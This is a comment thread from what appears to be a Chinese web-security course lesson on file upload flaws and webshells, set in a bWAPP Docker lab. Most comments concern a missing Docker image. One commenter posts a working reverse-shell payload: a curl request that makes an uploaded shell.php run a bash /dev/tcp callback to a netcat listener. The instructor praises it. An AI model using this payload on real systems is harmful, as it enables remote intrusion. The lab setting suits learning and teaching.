• Geek_7c4953
    2020-07-09
    从漏洞原理上来看,似乎文件上传漏洞仅适用于脚本后端程序,是不是非脚本后端程序(包括了不适用任何形式的脚本)就没有这个问题了呢?

    作者回复: 比如呢,Java 是编译型和解释型语言的结合体,不算脚本语言,但是也会存在文件上传漏洞。这个漏洞主要是对上传的文件审核不严格导致的,和后端是不是脚本语言没有关系。我想,你大概问的是webshell不能是binary这个问题吧,其实webshell也可以是binary的,也就是编译之后的产物,https://security.tencent.com/index.php/blog/msg/104,这里就演示了一种binary形式的webshell。目前之所以我们遇到的大部分都是脚本webshell,是因为后端程序主要是脚本来构建的,如果后端是通过C++来构建的应用程序,其实我们也是可以上传一个so或者dll文件用作webshell也是可行的。

    
    5
  • null
    2022-08-13 来自上海
    docker pull registry.cn-shanghai.aliyuncs.com/yhskc/bwapp 是不是没有了?拉取不到

    作者回复: 镜像貌似不在了,采用以下方法叭😊: 配置Docker加速: vi /etc/docker/daemon.json 添加: { "registry-mirrors":["https://docker.mirrors.ustc.edu.cn/"] } 重启Docker: systemctl daemon-reload systemctl restart docker Docker镜像获取方法: docker pull raesene/bwapp docker run -d -p 80:80 raesene/bwapp

    共 2 条评论
    2
  • Alfie
    2022-06-02
    你好,添加了阿里的镜像加速,但还是无法下载,资源限制被拒绝,Linux 系统上无法下载 # docker pull registry.cn-shanghai.aliyuncs.com/yhskc/bwapp Using default tag: latest Error response from daemon: pull access denied for registry.cn-shanghai.aliyuncs.com/yhskc/bwapp, repository does not exist or may require 'docker login': denied: requested access to the resource is denied

    作者回复: 镜像貌似不在了,采用以下方法叭😊: 配置Docker加速: vi /etc/docker/daemon.json 添加: { "registry-mirrors":["https://docker.mirrors.ustc.edu.cn/"] } 重启Docker: systemctl daemon-reload systemctl restart docker Docker镜像获取方法: docker pull raesene/bwapp docker run -d -p 80:80 raesene/bwapp

    共 7 条评论
    2
  • Kevin⚡️Zhou
    2020-07-18
    这节课尝试了一个很有趣的反向shell, = Mac端运行 nc -lv 8888 = 使用curl命令 curl --data-urlencode "hacker=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.13/8888 0>&1 ' \");" http://127.0.0.1/images/shell.php # 192.168.0.13是mac的局域网地址 这样可以获得一个反向shell进入docker容器中rm -rf啦

    作者回复: 从webshell->反弹sys shell,发散思维,赞👍

    共 2 条评论
    2
  • Long
    2020-07-14
    请问,我的这个shell.php是上传到了PC的哪个文件夹里面呀?我用的是windows10.

    作者回复: 上传的文件夹是docker内部,可以通过docker exec -it 指令与docker交互,然后找到目标路径,docker的volume有专门的存储地址,并且需要docker解析,和虚拟机很像,所以shell.php在PC上是找不到的。

    共 2 条评论
    2
  • hhhh
    2020-07-18
    老师命好,后端要不是php,比如是java有啥方法吗?如果传个带js的html是不是也能在客户端做一些事情。。

    作者回复: 从功能上,后端如果是java的话,也是可以做webshell的,比如java EE服务器可以用war包,jsp服务器可以直接做jsp webshell。关于带js的html,确实是可以做一些事情,但是如果已经可以上传webshell的情况下,其实权限已经比较高了,传webshell要更好一些,XSS就是修改前端代码的一种攻击方式,这部分我们后面会有专题来讲。

    共 2 条评论
    1
  • 清风徐来
    2022-11-07 来自安徽
    pull access denied for registry.cn-shanghai.aliyuncs.com/yhskc/bwapp, repository does not exist or may require 'docker login': denied: requested access to the resource is denied 镜像不存在了?

    作者回复: 镜像貌似不在了,采用以下方法叭😊: 配置Docker加速: vi /etc/docker/daemon.json 添加: { "registry-mirrors":["https://docker.mirrors.ustc.edu.cn/"] } 重启Docker: systemctl daemon-reload systemctl restart docker Docker镜像获取方法: docker pull raesene/bwapp docker run -d -p 80:80 raesene/bwapp

    
    
  • 清风徐来
    2022-11-07 来自安徽
    报错:pull access denied for registry.cn-shanghai.aliyuncs.com/yhskc/bwapp, repository does not exist or may require 'docker login': denied: requested access to the resource is denied 镜像是不是不存在了?

    作者回复: 镜像貌似不在了,采用以下方法叭😊: 配置Docker加速: vi /etc/docker/daemon.json 添加: { "registry-mirrors":["https://docker.mirrors.ustc.edu.cn/"] } 重启Docker: systemctl daemon-reload systemctl restart docker Docker镜像获取方法: docker pull raesene/bwapp docker run -d -p 80:80 raesene/bwapp

    
    
  • fromzerotohero
    2022-06-12
    docker镜像拉不下来,我已经登陆阿里云镜像仓库成功了,还是提示:docker: Error response from daemon: pull access denied for registry.cn-shanghai.aliyuncs.com/yhskc/bwapp, repository does not exist or may require 'docker login': denied: requested access to the resource is denied。

    作者回复: 镜像貌似不在了,采用以下方法叭😊: 配置Docker加速: vi /etc/docker/daemon.json 添加: { "registry-mirrors":["https://docker.mirrors.ustc.edu.cn/"] } 重启Docker: systemctl daemon-reload systemctl restart docker Docker镜像获取方法: docker pull raesene/bwapp docker run -d -p 80:80 raesene/bwapp

    
    
  • wcf
    2022-06-06
    镜像 pull 不下来, 报错. 加了阿里云镜像源也一样.难道镜像源必须是同一个区的嘛? ``` docker pull registry.cn-shanghai.aliyuncs.com/yhskc/bwapp Using default tag: latest Error response from daemon: pull access denied for registry.cn-shanghai.aliyuncs.com/yhskc/bwapp, repository does not exist or may require 'docker login': denied: requested access to the resource is denied ```

    作者回复: 镜像貌似不在了,采用以下方法叭😊: 配置Docker加速: vi /etc/docker/daemon.json 添加: { "registry-mirrors":["https://docker.mirrors.ustc.edu.cn/"] } 重启Docker: systemctl daemon-reload systemctl restart docker Docker镜像获取方法: docker pull raesene/bwapp docker run -d -p 80:80 raesene/bwapp

    
    